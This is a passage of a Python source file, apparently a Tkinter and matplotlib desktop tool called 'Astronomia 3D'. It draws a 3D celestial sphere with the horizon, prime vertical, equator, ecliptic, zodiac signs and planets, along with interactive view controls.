+{"seq_id":"18756686206","text":"import numpy as np\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfrom mpl_toolkits.mplot3d import proj3d\r\nfrom matplotlib.lines import Line2D\r\nfrom matplotlib.widgets import TextBox,RadioButtons\r\nfrom matplotlib.widgets import Button as widgets_Button\r\nfrom matplotlib.offsetbox import AnchoredText\r\nfrom matplotlib.backends.backend_tkagg import (FigureCanvasTkAgg, NavigationToolbar2Tk)\r\nfrom matplotlib.figure import Figure\r\nfrom matplotlib.patches import Circle, Wedge\r\nimport mpl_toolkits.mplot3d.art3d as art3d\r\n\r\nimport matplotlib.animation as animation\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter.filedialog import asksaveasfilename\r\nfrom tkinter import messagebox \r\n\r\nfrom calc_pl import *\r\nfrom help_windowAstron3D import *\r\nfrom func_tools import *\r\n\r\n#import keyboard\r\n\r\n\r\n\r\nclass c:\r\n planets={\"Sun\" : \"☉\", \"Moon\" : \"☽\", \"Mercury\" : \"☿\", \"Venus\" : \"♀\", \"Mars\" : \"♂\", \"Jupiter\" : \"♃\", \"Saturn\" : \"♄\", \"Uranus\" : \"♅\", \"Neptune\" : \"♆\", \"Pluto\" : \"♇\", \"Node_N\" : \"☊\", \"Node_S\" : \"☋\"}\r\n planets2=[\"Sun\", \"Moon\", \"Mercury\", \"Venus\", \"Mars\", \"Jupiter\", \"Saturn\", \"Uranus\", \"Neptune\", \"Pluto\", \"Node_N\", \"Node_S\", \"Asc\", \"MC\"]\r\n\r\nhouses_names=[\"\",\"I\", \"II\", \"III\", \"IV\", \"V\", \"VI\", \"VII\", \"VIII\", \"IX\", \"X\", \"XI\", \"XII\"]\r\nzodiac = [\"\",\"Aries\", \"Taurus\", \"Gemini\", \"Cancer\", \"Leo\", \"Virgo\", \"Libra\", \"Scorpio\", \"Sagittarius\", \"Capricorn\", \"Aquarius\", \"Pisces\"] \r\nzodiac2 = [\"\", \"♈\", \"♉\", \"♊\", \"♋\", \"♌\", \"♍\", \"♎\", \"♏\", \"♐\", \"♑\", \"♒\", \"♓\"]\r\n\r\ncolor_ecl=\"#A9A54B\"\r\ncolor_ecl_zod=\"#767109\"\r\ncolor_oran=\"#F38600\"\r\ncolor_yel=\"#EFC300\"\r\npl_colors={\"Sun\" : \"#F2C500\", \"Moon\" : \"#FF8D00\", \"Mercury\" : \"#008CD2\", \"Venus\" : \"#098100\", \"Mars\" : \"#AA0000\", \"Jupiter\" : \"#6E8CA5\", \"Saturn\" : \"#874400\", \"Uranus\" : \"#1900D6\", \"Neptune\" : \"#006695\", \"Pluto\" : \"#6D00A0\", \"Node_N\" : \"#333\", \"Node_S\" : \"#333\"} \r\n\r\nmain_circles_clickable = True # ecliptic, equator, horizon, prime vertical\r\nmain_circles_picker = 2 if main_circles_clickable == True else 0\r\n\r\ndata_pts=50\r\n\r\nclass astro3D():\r\n def __init__(self, parent,frame, planets_data, geo_latitude, data={}): #timestamp=0\r\n self.parent=parent\r\n bgr_col=\"#E0EFF0\"\r\n self.fig = Figure(figsize=(11,8), dpi=100, facecolor = bgr_col)\r\n self.ax = self.fig.add_subplot(111, projection='3d', facecolor = bgr_col)\r\n\r\n at = AnchoredText(\"Astronomia 3D by Popiel\", loc=\"lower right\",bbox_to_anchor=(0.9, 0.195), frameon=False,borderpad=0, prop=dict(alpha=0.2,size=13,color=\"#78A1A4\",fontfamily=\"Lucida Handwriting\"),bbox_transform=self.ax.transAxes)\r\n at.set_zorder(0)\r\n self.ax.add_artist(at)\r\n\r\n #================ \r\n\r\n size900=size760=False\r\n screenHeight = parent.winfo_screenheight()\r\n if screenHeight<880:size900=True\r\n if screenHeight<780:size760=True;size900=False\r\n\r\n f_w=11;f_h=8\r\n if size900==True: dd=0.93;self.fig.set_size_inches(f_w*dd, f_h*dd);\r\n elif size760==True: dd=0.80;self.fig.set_size_inches(f_w*dd, f_h*dd);\r\n\r\n #================ \r\n\r\n self.ids={}\r\n self.equat_ids=[]\r\n self.ecl_ids=[]\r\n self.pl_ids=[]\r\n self.leg_obj={}\r\n self.leg_items_ids=[]\r\n self.ecliptic_scale={}\r\n self.equator_scale={}\r\n\r\n\r\n #========== fix distorted circles (shown as ovals) ======\r\n limits = self.ax.get_w_lims()\r\n self.ax.set_box_aspect((limits[1]-limits[0],limits[3]-limits[2],limits[5]-limits[4]))\r\n #===============\r\n\r\n self.fig.subplots_adjust(left=-0.2, bottom=-0.3, right=0.95, top=1.25, wspace=None, hspace=None) #margins\r\n\r\n self.planets_data=planets_data\r\n self.geo_latitude=geo_latitude\r\n self.data=data\r\n self.timestampIni = self.data[\"timestamp\"]\r\n\r\n self.ε=23.44\r\n self.ε=self.data[\"obliquity\"]\r\n self.trueNode=data[\"trueNode\"]\r\n\r\n\r\n self.txt1=[0.87,0.206]\r\n self.prop_txt1={\"color\":'#333', \"fontsize\":8}\r\n self.id_text = self.ax.text2D(*self.txt1, \"\", **self.prop_txt1, transform=self.ax.transAxes)\r\n\r\n self.txt_name=[0.2,0.818]\r\n self.txt_time=[0.913,0.29]\r\n self.txt_time2=[0.911,0.26]\r\n self.txt1=[0.18,0.206]\r\n self.txt2=[0.41,0.206]\r\n self.txt3=[0.18,0.230]\r\n\r\n if size760==True:\r\n self.txt_time=[0.917+0.09,0.28]\r\n self.txt_time2=[0.915+0.09,0.25]\r\n elif size900==True:\r\n self.txt_time=[0.917+0.02,0.29]\r\n self.txt_time2=[0.915+0.02,0.26]\r\n\r\n bgr_col_bb1=\"#2D6266\"\r\n bgr_col_bb3=\"#70ADB2\"\r\n bgr_col_bb2=\"#EFE9DD\" \r\n PAGE_BG1 = \"#134752\"\r\n bgr_col_bb1=PAGE_BG1\r\n COL_2=\"#AA0000\"\r\n COL_3=\"#AB1D00\"\r\n bgr_col_bb3=\"#C4D4D5\" #blue\r\n\r\n\r\n self.prop_txt1={\"color\":'#333', \"fontsize\":8}\r\n self.prop_txt2={\"bbox\": dict(boxstyle=\"round\", facecolor=bgr_col_bb2, ec=\"#CEEFF1\", pad=0.3, alpha=0.8), \"color\":\"#333\", \"fontsize\":9 }\r\n col_4=\"#001D4B\"\r\n self.prop_txt3={\"bbox\": dict(boxstyle=\"round\", facecolor=bgr_col_bb3, ec=\"#CAE2E3\", pad=0.3, alpha=0.84), \"color\":col_4, \"fontsize\":10, \"fontweight\":400, \"fontfamily\":\"Tahoma\"}\r\n\r\n self.prop_txt_name={\"bbox\": dict(boxstyle=\"round\", facecolor=bgr_col_bb1, ec=\"#CEEFF1\", pad=0.4, alpha=0.9), \"color\":\"#EEEEEE\", \"fontsize\":10, \"fontweight\":800, \"alpha\":1}\r\n self.prop_txt_time={\"bbox\": dict(boxstyle=\"round\", facecolor=bgr_col_bb3, ec=\"#CAE2E3\", pad=0.5, alpha=0.84), \"color\":COL_3, \"fontsize\":10, \"fontweight\":600, \"fontfamily\":\"Consolas\"}\r\n self.prop_txt_time2={\"bbox\": dict(boxstyle=\"round\", facecolor=bgr_col_bb3, ec=\"#CAE2E3\", pad=0.4, alpha=0.74), \"color\":\"#333\", \"fontsize\":8, \"fontweight\":600, \"fontfamily\":\"Consolas\"}\r\n\r\n self.id_text = self.ax.text2D(*self.txt1, \"\", **self.prop_txt1, transform=self.ax.transAxes)\r\n self.id_text_2 = self.ax.text2D(*self.txt2, \"\", **self.prop_txt2, transform=self.ax.transAxes)\r\n self.id_text_3 = self.ax.text2D(*self.txt3, \"\", **self.prop_txt3, transform=self.ax.transAxes)\r\n\r\n help_x=1.036; help_y=0.2065\r\n if size760==True:help_x=1.036+0.126\r\n elif size900==True:help_x=1.036+0.035\r\n self.id_help_ico = self.ax.text2D(help_x, help_y, \"?\", c = \"#F6F6F6\", size = 10, fontweight = 800, picker=5, bbox = dict(boxstyle = \"circle\", edgecolor = \"#990000\",facecolor = \"#800000\",pad = 0.2), ha = \"left\", va = \"center\",alpha = 0.7, transform = self.ax.transAxes)\r\n\r\n #=============\r\n\r\n\r\n alpha_main=0.7\r\n self.alpha_main=alpha_main\r\n self.sw_cir_alpha=False\r\n\r\n self.ψ2 = np.linspace(-np.pi/2, np.pi/2, 100)\r\n self.w = np.array([0, -1, 0])\r\n\r\n #========== Horizon\r\n color_hor=\"#001440\"\r\n color_hor=\"#333333\"\r\n self.ψ = np.linspace(0, 2 * np.pi, 100)\r\n φ=self.ψ\r\n r=1\r\n x1=r * np.cos(φ)\r\n y1=r * np.sin(φ)\r\n z1=np.zeros(np.size(x1))\r\n \r\n '''\r\n #solid\r\n id_,=self.ax.plot(x1,y1,z1,color=color_hor,linewidth=2 ,picker=2)\r\n self.hor_circl=id_\r\n #id_=id(id_)\r\n self.ids[id(id_)] =[[x1[3],y1[3],z1[0]],\"Horizon\"]\r\n '''\r\n\r\n φ_1 = np.linspace(-np.pi/2, np.pi/2, 50)\r\n x1=r * np.cos(φ_1); y1=r * np.sin(φ_1); z1=np.zeros(np.size(x1));\r\n id_1, = self.ax.plot(x1,y1,z1 ,color=color_hor,picker=main_circles_picker, linewidth=1, linestyle = \"solid\", alpha=alpha_main)\r\n\r\n self.hor_circl_1=id_1\r\n self.ids[id(id_1)] =[[x1[20],y1[20],z1[0]],\"Horizon\"]\r\n\r\n φ_2 = np.linspace(np.pi/2,np.pi*3/2, 50)\r\n x1=r * np.cos(φ_2); y1=r * np.sin(φ_2); z1=np.zeros(np.size(x1));\r\n id_2, = self.ax.plot(x1,y1,z1 ,color=color_hor,picker=main_circles_picker, linewidth=1, linestyle = \"dashed\", alpha=alpha_main) \r\n\r\n self.hor_circl_2=id_2\r\n self.ids[id(id_2)] =[self.ids[id(id_1)][0],\"Horizon\"]\r\n\r\n\r\n #======== Prime vertical\r\n \r\n color_vert=\"#050835\"\r\n color_vert=color_hor\r\n θ=self.ψ\r\n\r\n '''\r\n #solid \r\n z2= r * np.cos(θ) \r\n x2= r * np.sin(θ)\r\n y2=np.zeros(np.size(x2))\r\n id_,=self.ax.plot(x2,y2,z2,color=color_vertlinewidth=1,picker=2 ) #\"#0009BC\"\r\n self.ids[id(id_)] =[[x2[20],y2[20],z2[20]],\"Prime Vertical\"] #\"v_rot+π/2\"\r\n self.prime_vert=id_\r\n '''\r\n φ_1 = np.linspace(0, np.pi, 50)\r\n x2=r * np.sin(φ_1); z2=r * np.cos(φ_1); y2=np.zeros(np.size(x2));\r\n id_1, = self.ax.plot(x2,y2,z2 ,color=color_vert, linewidth=1, linestyle = \"solid\", alpha=alpha_main,picker=main_circles_picker)\r\n\r\n self.prime_vert_1=id_1\r\n self.ids[id(id_1)] =[[x2[13],y2[13],z2[13]],\"Prime Vertical\"]\r\n\r\n φ_2 = np.linspace(np.pi,2*np.pi, 50)\r\n x2=r * np.sin(φ_2); z2=r * np.cos(φ_2); y2=np.zeros(np.size(x1));\r\n id_2, = self.ax.plot(x2,y2,z2 ,color=color_vert, linewidth=1, linestyle = \"dashed\", alpha=alpha_main,picker=main_circles_picker) \r\n\r\n self.prime_vert_2=id_2\r\n self.ids[id(id_2)] =[self.ids[id(id_1)][0], \"Prime Vertical\"]\r\n\r\n X,Y,Z =self.draw_axes()\r\n\r\n id_=self.ax.scatter(1, 0, 0, marker=\"o\",c=\"#265678\", s=9, zorder=0); \"#3B6D91\"\r\n self.ids[id(id_)] =[[1,0,0],\" φ=0, θ=0\"]\r\n self.start_pt=id_\r\n\r\n self.plot_circle_scale(\"Horizon\");\r\n self.plot_circle_scale(\"Prime vertical\")\r\n\r\n\r\n #================\r\n\r\n self.date_utc = self.data[\"d_utc\"]\r\n self.time_utc = self.data[\"t_utc\"]\r\n self.timestamp = self.data[\"timestamp\"]\r\n self.geo_longitude=float(self.data[\"lon\"])\r\n\r\n name = \" {} {} \".format(self.data[\"n\"], self.data[\"ln\"])\r\n time_utc = \" UTC: {: >10}, {: >8} \".format(self.data[\"d_utc\"], self.data[\"t_utc\"])\r\n d_loc=\"{}-{}-{}\".format(self.data[\"d\"][2], self.data[\"d\"][1], self.data[\"d\"][0])\r\n t_loc=\"{: >2}:{:0>2}:{}\".format(self.data[\"t\"][0], self.data[\"t\"][1], self.data[\"t\"][2])\r\n time_loc = \"{: >10}, {: >8}\".format(d_loc, t_loc)\r\n time_loc= \"{: ^21}\".format(time_loc)\r\n name=\"\"\r\n self.id_text_name= self.ax.text2D(*self.txt_name, name, **self.prop_txt_name, transform=self.ax.transAxes)\r\n self.id_text_time= self.ax.text2D(*self.txt_time, time_loc, **self.prop_txt_time, transform=self.ax.transAxes)\r\n self.id_text_time2= self.ax.text2D(*self.txt_time2, time_utc, **self.prop_txt_time2, transform=self.ax.transAxes)\r\n\r\n #================\r\n\r\n self.plot_Equator_Ecliptic() \r\n self.draw_sphere()\r\n self.sphere_.set_visible(False) \r\n self.draw_surface()\r\n self.plot_meridian()\r\n \r\n self.planets_obj={}\r\n self.houses_obj={}\r\n self.zodiac_obj={}\r\n self.planets_ids={}\r\n self.houses_ids={}\r\n self.zodiac_ids={}\r\n self.plot_planets(self.planets_data)\r\n self.plot_zodiac()\r\n\r\n style_=(0, (1, 2))\r\n id_axes,=self.ax.plot(X,Y,Z ,color='#999999',linestyle = style_,label='Axes', alpha=alpha_main,picker=0)\r\n self.leg_items_ids.append(id_axes) ;self.axes_id=id_axes\r\n\r\n self.azim0=20\r\n self.elev0=15\r\n self.ax.view_init(elev = self.elev0, azim = self.azim0)\r\n\r\n \r\n col_=\"#900000\"\r\n self.annot = self.ax.annotate(\"click\", xy=(0,0), fontsize=9, c=col_, xytext=(-20,20),textcoords=\"offset points\",bbox=dict(boxstyle=\"round,pad=0.5\", fc=\"#FCFF90\", alpha = 0.7),arrowprops=dict(arrowstyle=\"->\"), zorder=20) #\"offset pixels\"\r\n self.annot.set_visible(False)\r\n\r\n self.click_tip_list=[\"North Pole\", \"South Pole\", \"Ecliptic North Pole\", \"Ecliptic South Pole\"]\r\n\r\n\r\n #========== Legend ========\r\n leg_colPM=\"#333333\"\r\n leg_colHor=color_hor\r\n leg_colPM=color_vert \r\n add_item0 = Line2D([0], [0], marker=\"o\", color=\"w\", label=\"Sphere\", markerfacecolor=\"#D0C7E8\", markersize=10,linewidth=10)\r\n add_item1 = Line2D([0], [0], marker=\"s\", color=\"w\", label=\"Equator\", markerfacecolor=\"#700000\", markersize=10,linewidth=10)\r\n add_item2 = Line2D([0], [0], marker=\"s\", color=\"w\", label=\"Ecliptic\", markerfacecolor=\"#A9A54B\", markersize=10)#\r\n add_item3 = Line2D([0], [0], marker=\"s\", color=\"w\", label=\"Horizon\", markerfacecolor=leg_colHor, markersize=10)\r\n add_item4 = Line2D([0], [0], marker=\"s\", color=\"w\", label=\"Prime Vertical\", markerfacecolor=leg_colPM, markersize=10)\r\n add_item5 = Line2D([0], [0], marker=\"s\", color=\"w\", label=\"Meridian\",markerfacecolor=\"#333333\", markersize=10)#\r\n add_item6 = Line2D([0], [0], marker=\"s\", color=\"w\", label=\"Proj. Horizons\",markerfacecolor=\"#2D305C\", markersize=10)\r\n add_item7 = Line2D([0], [0], marker=\"s\", color=\"w\", label=\"Parallels\",markerfacecolor=\"#333333\", markersize=10)\r\n add_item8 = Line2D([0], [0], marker=\"*\", color=\"w\", label=\"Extra off\",markerfacecolor='#543E17', markersize=10)#\r\n\r\n add_item9 = Line2D([0], [0], marker='o', color='#DCDCDC', label=\"Show half\",markerfacecolor='#333333', markersize=1,linestyle=\"dashed\")\r\n\r\n id_scale= Line2D([0], [0], marker='o', color='#DCDCDC', label=\"Scale\",markerfacecolor='#333333', markersize=1,linestyle=\"dashed\")\r\n #add_item24 = Line2D([0], [0], marker=\"o\", color=\"w\", label=\"Show grid\", markerfacecolor='#111111', markersize=10)\r\n\r\n self.leg_mer_circle=add_item5\r\n\r\n for id_ in [add_item0, add_item1, add_item2, add_item3, add_item4, add_item5,add_item8, add_item9,id_scale]:\r\n self.leg_items_ids.append(id_)\r\n\r\n leg_x=0.99;leg_y=0.99\r\n self.legend = self.fig.legend(handles=self.leg_items_ids,loc=\"upper right\",fancybox=True, shadow=True,borderpad=0.6,bbox_to_anchor=(leg_x, leg_y), prop=dict(size=10))\r\n\r\n for legline, line, text in zip(self.legend.get_lines(), self.leg_items_ids, self.legend.get_texts()):\r\n legline.set_picker(True)\r\n legline.set_pickradius(6)\r\n txt=text.get_text()\r\n self.leg_obj[legline] = (txt, line)\r\n\r\n\r\n #===============\r\n x001 = 0.92\r\n y001 = 0.58\r\n\r\n #Texts \"View:\"\r\n resize = 0.58\r\n f_size = 9\r\n f_col = \"#333\"\r\n b_col = \"#D3D3D3\"\r\n e_col = \"#999999\"\r\n b_col2 = \"#EEEEEE\"\r\n font_f = \"Courier New\" #\"Tahoma\"\r\n font_w = \"bold\"\r\n alpha_t = 0.9\r\n\r\n x00 = 0.916\r\n y00 = 0.58\r\n\r\n if size760==True:resize = 0.7; dd=0.93;x00=x00+0.1\r\n elif size900==True: resize = 0.625; dd=0.93;x00=x00+0.03\r\n\r\n x0 = x00; y0 = y00;dx = 0.0368; dx1 = 0.04 \r\n dx = resize * dx; x01= 0.009\r\n\r\n self.id_view=self.ax.text2D(x0, y0, \"View:\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w, bbox = dict(boxstyle = \"round\", edgecolor = b_col2, facecolor = b_col2,pad = 0.3), picker = 3, ha = \"left\", va = \"center\",alpha = 1, transform = self.ax.transAxes)\r\n self.id_E = self.ax.text2D(x0 + x01 + 2*dx, y0, \"E\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5, bbox = dict(boxstyle = \"round\", edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"center\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes)\r\n self.id_W = self.ax.text2D(x0 + x01 + 3*dx, y0, \"W\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5, bbox = dict(boxstyle = \"round\", edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"center\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes)\r\n self.id_N = self.ax.text2D(x0 + x01 + 4*dx, y0, \"N\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5, bbox = dict(boxstyle = \"round\", edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"center\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes) \r\n self.id_S = self.ax.text2D(x0 + x01 + 5*dx, y0, \"S\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5, bbox = dict(boxstyle = \"round\", edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"center\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes)\r\n\r\n #Texts \"Azim:\"\r\n x0 = x00 \r\n dy00 = 0.04\r\n dy00 = resize * dy00\r\n y0 = y00 - dy00;\r\n dy = 0.035;\r\n dx = 0.0449 ; dx1 = 0.024\r\n dx = resize * dx\r\n dy = resize * dy\r\n\r\n self.id_azim=self.ax.text2D(x0, y0 , \"Azim:\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w, bbox = dict(boxstyle = \"round\", edgecolor = b_col2, facecolor = b_col2, pad = 0.3), picker = 3, ha = \"left\", va = \"center\",alpha = 1, transform = self.ax.transAxes) \r\n\r\n self.id_A0 = self.ax.text2D(x0 + dx1 + dx, y0 , \" 0\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5,bbox = dict(boxstyle = \"round\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\", alpha = alpha_t, transform = self.ax.transAxes) \r\n self.id_A90 = self.ax.text2D(x0 + dx1 + 2*dx, y0 , \"90\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5,bbox = dict(boxstyle = \"round\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes)\r\n self.id_A180 = self.ax.text2D(x0 + dx1 + 3*dx, y0 , \"180\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5,bbox = dict(boxstyle = \"round\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes)\r\n\r\n self.id_elev=self.ax.text2D(x0, y0 - dy, \"Elev:\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , bbox = dict(boxstyle = \"round\",edgecolor = b_col2, facecolor = b_col2,pad = 0.3), picker = 3, ha = \"left\", va = \"center\",alpha = 1, transform = self.ax.transAxes) \r\n\r\n self.id_E0 = self.ax.text2D(x0 + dx1 + dx, y0 - dy, \" 0\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5,bbox = dict(boxstyle = \"round\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes) \r\n self.id_E90 = self.ax.text2D(x0 + dx1 + 2*dx, y0 - dy, \"90\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5,bbox = dict(boxstyle = \"round\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes)\r\n self.id_E180 = self.ax.text2D(x0 + dx1 + 3*dx, y0 - dy, \"180\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5, bbox = dict(boxstyle = \"round\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes) \r\n \r\n #Texts \"Init \"\r\n\r\n dy = 0.05; dx = 0.04\r\n x0 = x00\r\n dy00 = 0.07\r\n dy00 = resize * dy00\r\n y0 = y00 - dy00 \r\n dy = 0.056; dx = 0.077\r\n dx = resize * dx\r\n dy = resize * dy\r\n\r\n self.id_v_start = self.ax.text2D(x0, y0 - dy, \"Init \", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5,bbox = dict(boxstyle = \"round\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\", alpha = alpha_t, transform = self.ax.transAxes)\r\n self.id_v_chart = self.ax.text2D(x0 + dx, y0 - dy, \"Chart\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5,bbox = dict(boxstyle = \"round\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\", alpha = alpha_t, transform = self.ax.transAxes) \r\n self.id_v_Eq = self.ax.text2D(x0 + 2*dx, y0 - dy, \"Equat\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5,bbox = dict(boxstyle = \"round\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\", alpha = alpha_t, transform = self.ax.transAxes) \r\n\r\n x0 = x00; \r\n dx00 = 0.082\r\n dx00 = resize * dx00\r\n x0 = x0 + dx00\r\n dy00 = 0.15\r\n dy00 = resize * dy00\r\n y0 = y00 - dy00\r\n dx1 = 0.02; dx2=0.024\r\n dy1 = 0.08; dy2 = 0.14; dy3 = 0.11;\r\n dy1 = resize * dy1; dy2 = resize * dy2; dy3 = resize * dy3\r\n\r\n dx2=0.028;dx2b=0.024\r\n f_size2=7\r\n self.id_v_up = self.ax.text2D(x0 + resize * dx1, y0 - dy1, \" \", c = f_col, size = f_size2, fontfamily = font_f, fontweight = font_w , picker = 5, bbox = dict(boxstyle = \"rarrow\",edgecolor = e_col,facecolor = b_col,pad = 0.3), rotation=90, ha = \"left\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes)\r\n self.id_v_down = self.ax.text2D(x0 + resize * dx1, y0 - dy2, \" \", c = f_col, size = f_size2, fontfamily = font_f, fontweight = font_w , picker = 5, bbox = dict(boxstyle = \"larrow\", edgecolor = e_col,facecolor = b_col,pad = 0.3), rotation=90, ha = \"left\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes) \r\n self.id_v_left = self.ax.text2D(x0 + resize * dx1 - resize * dx2, y0 - dy3, \" \", c = f_col, size = f_size2, fontfamily = font_f, fontweight = font_w , picker = 5, bbox = dict(boxstyle = \"larrow\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes)\r\n self.id_v_right = self.ax.text2D(x0 + resize * dx1 + resize * dx2b, y0 - dy3, \" \", c = f_col, size = f_size2, fontfamily = font_f, fontweight = font_w , picker = 5, bbox = dict(boxstyle = \"rarrow\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes)\r\n\r\n\r\n self.id_v_anim=None\r\n self.id_v_prev=self.id_v_next=None\r\n self.id_v_test=None\r\n\r\n\r\n self.half=0\r\n self.view_East=[self.hor_circl_1, self.prime_vert_1, self.eq_circl_1, self.ecl_circl_1]\r\n self.view_West=[self.hor_circl_2, self.prime_vert_2, self.eq_circl_2, self.ecl_circl_2]\r\n\r\n self.circles_alpha()\r\n\r\n self.ax.set_axis_off() \r\n self.ax.axison=False\r\n\r\n self.ax.set_xlabel('x - axis'); self.ax.set_ylabel('y - axis'); self.ax.set_zlabel('z - axis')\r\n arr=[-1,0,1]\r\n self.ax.set_xticks(arr); self.ax.set_yticks(arr); self.ax.set_zticks(arr);\r\n\r\n self.xlim = self.ax.get_xlim()\r\n self.ylim = self.ax.get_ylim()\r\n self.zlim = self.ax.get_zlim()\r\n\r\n\r\n #============= Tkinter =============\r\n self.canvas = FigureCanvasTkAgg(self.fig, master = frame)\r\n self.canvas.draw() \r\n self.canvas.get_tk_widget().pack(side=TOP, anchor=NW, fill=BOTH, expand=True)\r\n\r\n self.canvas.mpl_connect('button_press_event', self.on_click)\r\n self.canvas.mpl_connect('pick_event', self.onpick) \r\n self.canvas.mpl_connect('key_release_event', self.key_)\r\n #self.canvas.mpl_connect('scroll_event', self.scroll_zoom)\r\n \r\n #=========== window size \r\n\r\n mins_x=1000;mins_y=700\r\n self.parent.minsize(mins_x,mins_y)\r\n w,h = self.fig.get_size_inches()*self.fig.dpi\r\n h = h + 100 #figure plus parent window\r\n w = w + 50\r\n window=self.parent\r\n screenHeight = window.winfo_screenheight()\r\n screenWidth = window.winfo_screenwidth()\r\n x = int(screenWidth/2 - w/2)\r\n y = int(screenHeight/2 - h/2)\r\n window.wm_geometry(\"+{}+{}\".format(x, y))\r\n window.resizable(False, False) \r\n\r\n def draw_axes(self): \r\n z4 = np.linspace(-1.01,1.01,50)\r\n y4 = np.zeros(np.size(z4))\r\n x4 = np.zeros(np.size(y4))\r\n\r\n x5 = np.linspace(-1.01,1.01,50)\r\n y5 = np.zeros(np.size(z4))\r\n z5 = np.zeros(np.size(y4))\r\n\r\n y6 = np.linspace(-1.01,1.01,50)\r\n x6 = np.zeros(np.size(z4))\r\n z6 = np.zeros(np.size(y4))\r\n\r\n #========joined data for legend - one item only to swicth off\r\n X=np.append(x4,np.NaN);X=np.append(X,x5) ;X=np.append(X,np.NaN); X=np.append(X,x6)\r\n Y=np.append(y4,np.NaN);Y=np.append(Y,y5) ;Y=np.append(Y,np.NaN); Y=np.append(Y,y6)\r\n Z=np.append(z4,np.NaN);Z=np.append(Z,z5) ;Z=np.append(Z,np.NaN); Z=np.append(Z,z6)\r\n\r\n return [X,Y,Z] \r\n\r\n def circles_alpha(self):\r\n if self.sw_cir_alpha==False:\r\n self.prime_vert_1.set_alpha(0.4)\r\n self.prime_vert_2.set_alpha(0.2)\r\n self.hor_circl_2.set_alpha(0.2) \r\n self.mer_circle.set_alpha(0.2)\r\n self.axes_id.set_alpha(0.2)\r\n\r\n for cir in [self.eq_circl_2, self.ecl_circl_2]:\r\n cir.set_alpha(0.2) \r\n\r\n for el in self.ecliptic_scale:\r\n self.ecliptic_scale[el][0].set_alpha(0.5) \r\n self.ecliptic_scale[el][1].set_alpha(0.5) \r\n for el in self.equator_scale:\r\n self.equator_scale[el][0].set_alpha(0.5) \r\n self.equator_scale[el][1].set_alpha(0.5)\r\n\r\n self.sw_cir_alpha=True\r\n\r\n elif self.sw_cir_alpha==True:\r\n self.prime_vert_1.set_alpha(self.alpha_main)\r\n self.prime_vert_2.set_alpha(self.alpha_main)\r\n self.hor_circl_2.set_alpha(self.alpha_main) \r\n self.mer_circle.set_alpha(self.alpha_main)\r\n self.axes_id.set_alpha(self.alpha_main)\r\n\r\n for cir in [self.eq_circl_1, self.ecl_circl_1]:\r\n cir.set_alpha(self.alpha_main_2)\r\n for cir in [self.eq_circl_2, self.ecl_circl_2]:\r\n cir.set_alpha(self.alpha_main_2) \r\n\r\n for el in self.ecliptic_scale:\r\n self.ecliptic_scale[el][0].set_alpha(self.alpha_main) \r\n self.ecliptic_scale[el][1].set_alpha(self.alpha_main) \r\n for el in self.equator_scale:\r\n self.equator_scale[el][0].set_alpha(self.alpha_main) \r\n self.equator_scale[el][1].set_alpha(self.alpha_main) \r\n\r\n self.sw_cir_alpha=False\r\n\r\n\r\n def plot_Equator_Ecliptic(self):\r\n ARMC=self.planets_data[\"MC\"][\"eq\"][0] \r\n ARMC=float(ARMC)\r\n ARMC=norm_(ARMC)\r\n self.ARMC=ARMC\r\n φ = self.ψ\r\n self.k = k = np.array([1, 0, 0])\r\n self.v = v = np.array([0, 1, 0])\r\n\r\n geo_latitude=self.geo_latitude\r\n s1 = \"S\" if self.geo_latitude<0 else \"N\"\r\n s2 = \"W\" if self.geo_longitude<0 else \"E\"\r\n txt=\"ARMC={:.0f}°, lat={:.0f}°{}, lon={:.0f}°{}\".format(ARMC,self.geo_latitude,s1,self.geo_longitude,s2)\r\n self.id_text.set_text(txt)\r\n self.south = True if self.geo_latitude<0 else False\r\n\r\n 